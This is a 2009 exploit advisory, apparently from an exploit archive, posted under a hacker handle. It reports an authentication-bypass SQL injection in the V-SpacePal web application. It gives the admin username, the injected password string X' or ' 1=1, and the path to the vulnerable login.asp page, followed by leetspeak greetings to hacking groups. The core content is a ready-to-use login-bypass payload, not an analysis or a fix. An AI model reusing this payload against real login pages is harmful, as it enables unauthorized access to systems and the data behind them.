V-SpacePal SQL Injection Vulnerability :

Date : 2009-12-16 Author : R3d-D3v!L
[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[?]
[~] Vendor: www.datachecknh.com
[?]
[?] Software: V-SpacePal
[?] Price $29.95 (One-time fee)
[?] author: ((R3d D3v!L))
[?]
[?] Date: 15.12.2009
[?]
[?] Home: WwW.XP10.ME
[?]
[?] contact: [email protected]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????

[?] ERR0R CONSOLE

NOT FOUND CHAR_(N0T NULL)

[?]SECURE ALERT FR0M 7h3 R3d-D3V!L

[?] Exploit:

[?] User Name : admin


[?] password : X' or ' 1=1

[?]demo:

[?]server/VSPACEDemo/login.asp

N073:
R34L R3d-D3V!L WAS h3R3 ((?0NE NAME 7h3Y ALL FA!R ?))

4R48!4N-HACK3R!!

[~]-----------------------------{str0ke}-----------------------------------------------------

[~] Greetz tO: dolly & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ِALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA

[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]--------------------------------------------------------------------------------

C1

 

C2

 

C3